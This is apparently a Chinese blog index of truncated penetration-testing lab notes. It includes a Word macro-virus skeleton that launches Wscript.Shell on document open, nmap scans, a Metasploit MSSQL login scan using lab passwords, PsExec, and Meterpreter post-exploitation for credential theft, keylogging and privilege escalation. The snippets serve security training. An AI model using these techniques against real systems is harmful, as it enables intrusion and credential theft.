实验环境内网网段：10.10.10.1/24DMZ网段：192.168.111.1/24配置信息DCOS：Windows 2012(64)IP：10.10.10.10应用：AD域WEBOS：Windows 2008(64)IP1：10.10.10.80IP2：192.168.111.80PCOS：Windo...

1. 创建一个doc文件 不要docx的 2. 开始创建宏 3. 宏病毒框架Sub AutoOpen() MyMacro End Sub Sub Document_Open() MyMacro End Sub Sub MyMacro() #这里写命令 CreateObject('Wscript.Shell'...

实验环境攻击者 Kali 192.168.192.128受害者 mrRoot IP未知攻击者和受害者在同一网段 1. 信息收集nmap -sn 192.168.192.0/24 收集受害者服务详情nmap -sV -A 192.168.192.16122/tcp closed ss...

1. 终端Terminal介绍1. 终端切换查看目前有谁在使用终端whoami:查看当前终端的登陆者[root@localhost ~]# whoami rootwho am i:查看当前登陆的终端、登陆者以及登陆时间等信息[root@localhost ~...

我们现在已经登录到了管理员页面 用wappalyzer查看使用的是什么服务 LMS moodle 查询如何查看版本https://www.isharkfly.com/t/moodle/4486 Google查询 moodle 2.2.3 exploit发现可以使用 e...

在win2008上扫描到了mssql 使用之前收集到的用户名和密码testuser cvcvgjASD!@wwwuser wwwuser_123Aqx 直接复制到/tmp/user.txt中use auxiliary/scanner/mssql/mssql_login set rhosts 192.16...

https://learn.microsoft.com/zh-cn/sysinternals/downloads/psexecPSExec 命令行工具类似于 runas，这个工具与 runas.exe 之间的区别在于PSExec有更多的选项和灵活性被称为命令行下的远程桌面...

1.后渗透模块 post模块post后渗透模块基本功能提升用户权限检索系统凭据(口令)窃取用户cookies和保存的口令键盘捕获等外设 2. MSF进程迁移step 1 提权getsystemstep 2 查看pid 选择一个psstep3...

1. open()打开文件函数在Python，使用open函数，可以打开一个已经存在的文件，或者创建一个新文件，语法如下：open(name,mode,encoding)name：是要打开的目标文件名的字符串（可以包含文件所在...

假设管理员将服务保存在如下路径下：C:\Proqram Files\Unquoted Path Service\Common Files\unquotedpathservice.exe程序执行路径中有空格由于空格字符，操作系统将把前面的路径视为五个不同的...